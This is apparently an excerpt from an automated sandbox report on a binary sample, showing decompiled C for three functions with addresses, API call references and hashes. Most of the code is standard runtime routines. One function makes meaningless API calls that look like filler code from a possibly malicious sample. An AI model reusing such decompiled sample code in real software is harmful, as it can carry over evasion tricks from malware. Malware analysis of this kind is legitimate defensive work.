                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
                                                            • Instruction ID: a72e1e6b92dd8046c8415602afada28cf0afd50c9d618631ceac23c624d3e928
                                                            • Opcode Fuzzy Hash: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
                                                            • Instruction Fuzzy Hash: A831AE31A10256EFDB20DF74C9809AB7BA6BF01310B15857EE5A1AB2D2DB34DD80DB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00409D43(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                            				intOrPtr _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            
                                                            				_t25 = _a16;
                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                            					_t26 = E00409634(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            					goto L9;
                                                            				} else {
                                                            					_t34 = _t25 - 0x66;
                                                            					if(_t25 != 0x66) {
                                                            						__eflags = _t25 - 0x61;
                                                            						if(_t25 == 0x61) {
                                                            							L7:
                                                            							_t26 = E00409724(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            						} else {
                                                            							__eflags = _t25 - 0x41;
                                                            							if(__eflags == 0) {
                                                            								goto L7;
                                                            							} else {
                                                            								_t26 = E00409C49(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            							}
                                                            						}
                                                            						L9:
                                                            						return _t26;
                                                            					} else {
                                                            						return E00409B8E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                            					}
                                                            				}
                                                            			}






                                                            0x00409d48
                                                            0x00409d4e
                                                            0x00409dc1
                                                            0x00000000
                                                            0x00409d55
                                                            0x00409d55
                                                            0x00409d58
                                                            0x00409d73
                                                            0x00409d76
                                                            0x00409d96
                                                            0x00409da8
                                                            0x00409d78
                                                            0x00409d78
                                                            0x00409d7b
                                                            0x00000000
                                                            0x00409d7d
                                                            0x00409d8f
                                                            0x00409d8f
                                                            0x00409d7b
                                                            0x00409dc6
                                                            0x00409dca
                                                            0x00409d5a
                                                            0x00409d72
                                                            0x00409d72
                                                            0x00409d58

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                            • Instruction ID: 7aaf76d984b8bee9c108c0065b9737c736a60a61fa3666d8c25626394b4aeabb
                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                            • Instruction Fuzzy Hash: D511833244014EBBCF125F85DC41CEE3F62BF59394F588426FA1869172C63BC972AB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402834() {
                                                            				long _v8;
                                                            				char _v1032;
                                                            				void* __edi;
                                                            				unsigned int _t4;
                                                            				unsigned int _t12;
                                                            				unsigned int* _t14;
                                                            				unsigned int* _t16;
                                                            
                                                            				_t14 =  *0x4796c8;
                                                            				_t4 =  *0x479904 >> 3;
                                                            				if(_t4 > 0) {
                                                            					_t16 = _t14;
                                                            					_t12 = _t4;
                                                            					do {
                                                            						_t24 =  *0x479904 - 0x959;
                                                            						if( *0x479904 == 0x959) {
                                                            							GetProcessWorkingSetSize(0, 0, 0);
                                                            							WriteConsoleW(0, 0, 0,  &_v8, 0);
                                                            							LCMapStringA(0, 0, 0, 0,  &_v1032, 0);
                                                            							DebugActiveProcess(0);
                                                            						}
                                                            						_t4 = E004026CF(_t16, _t24);
                                                            						_t16 = _t16 + 8;
                                                            						_t12 = _t12 - 1;
                                                            					} while (_t12 != 0);
                                                            				}
                                                            				return _t4;
                                                            			}










                                                            0x0040283c
                                                            0x00402849
                                                            0x00402850
                                                            0x00402854
                                                            0x00402856
                                                            0x00402858
                                                            0x00402858
                                                            0x00402862
                                                            0x00402867
                                                            0x00402875
                                                            0x00402887
                                                            0x0040288e
                                                            0x0040288e
                                                            0x00402894
                                                            0x00402899
                                                            0x0040289c
                                                            0x0040289c
                                                            0x004028a0
                                                            0x004028a3

                                                            APIs
                                                            • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00402867
                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402875
                                                            • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402887
                                                            • DebugActiveProcess.KERNEL32(00000000), ref: 0040288E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: Process$ActiveConsoleDebugSizeStringWorkingWrite
                                                            • String ID:
                                                            • API String ID: 4204620807-0
                                                            • Opcode ID: 20de60e2ee61012a58b6b8025d7d002658b7e72ab285d690b72ada9a80ada242
                                                            • Instruction ID: 74759e126b1416d0d5b096d680b94f0c74fc9fd99496b66936d923ced4efafbd
                                                            • Opcode Fuzzy Hash: 20de60e2ee61012a58b6b8025d7d002658b7e72ab285d690b72ada9a80ada242
                                                            • Instruction Fuzzy Hash: E2F08CB21030387AD3207755AE4CCEB7B6CEF863A5B000136F609A22A0D6745981C6FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00408E90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _t13;
                                                            				void* _t25;
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t29;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            
                                                            				_t31 = __eflags;
                                                            				_t26 = __edi;
                                                            				_t25 = __edx;
                                                            				_t22 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x410018);
                                                            				E0040487C(__ebx, __edi, __esi);
                                                            				_t29 = E004063F0(__ebx, _t31);
                                                            				_t13 =  *0x411dcc; // 0xfffffffe
                                                            				if(( *(_t29 + 0x70) & _t13) == 0) {
                                                            					L6:
                                                            					E00406842(_t22, _t25, _t26, 0xc);
                                                            					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                            					_t8 = _t29 + 0x6c; // 0x6c
                                                            					_t27 =  *0x411eb0; // 0x411dd8
                                                            					 *((intOrPtr*)(_t30 - 0x1c)) = E00408E52(_t8, _t25, _t27);
                                                            					 *(_t30 - 4) = 0xfffffffe;
                                                            					E00408EFA();
                                                            				} else {
                                                            					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                                                            					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_t29 =  *((intOrPtr*)(E004063F0(_t22, _t33) + 0x6c));
                                                            					}
                                                            				}
                                                            				if(_t29 == 0) {
                                                            					E00403B50(0x20);
                                                            				}
                                                            				return E004048C1(_t29);
                                                            			}









                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e92
                                                            0x00408e97
                                                            0x00408ea1
                                                            0x00408ea3
                                                            0x00408eab
                                                            0x00408ecf
                                                            0x00408ed1
                                                            0x00408ed7
                                                            0x00408edb
                                                            0x00408ede
                                                            0x00408ee9
                                                            0x00408eec
                                                            0x00408ef3
                                                            0x00408ead
                                                            0x00408ead
                                                            0x00408eb1
                                                            0x00000000
                                                            0x00408eb3
                                                            0x00408eb8
                                                            0x00408eb8
                                                            0x00408eb1
                                                            0x00408ebd
                                                            0x00408ec1
                                                            0x00408ec6
                                                            0x00408ece

                                                            APIs
                                                            • __getptd.LIBCMT ref: 00408E9C
                                                              • Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
                                                              • Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400
                                                            • __getptd.LIBCMT ref: 00408EB3
                                                            • __amsg_exit.LIBCMT ref: 00408EC1
                                                            • __lock.LIBCMT ref: 00408ED1
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                            • String ID:
                                                            • API String ID: 3521780317-0
                                                            • Opcode ID: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
                                                            • Instruction ID: 7dfb229ca309a3576c6494551f69a8709b23ae4e697a609cd87e5ec77ce5a6c7
                                                            • Opcode Fuzzy Hash: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
                                                            • Instruction Fuzzy Hash: E1F090329107408AD720BB6AD502B4E73A0AB40729F11853FE985B72D3CF7CAA019BDD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%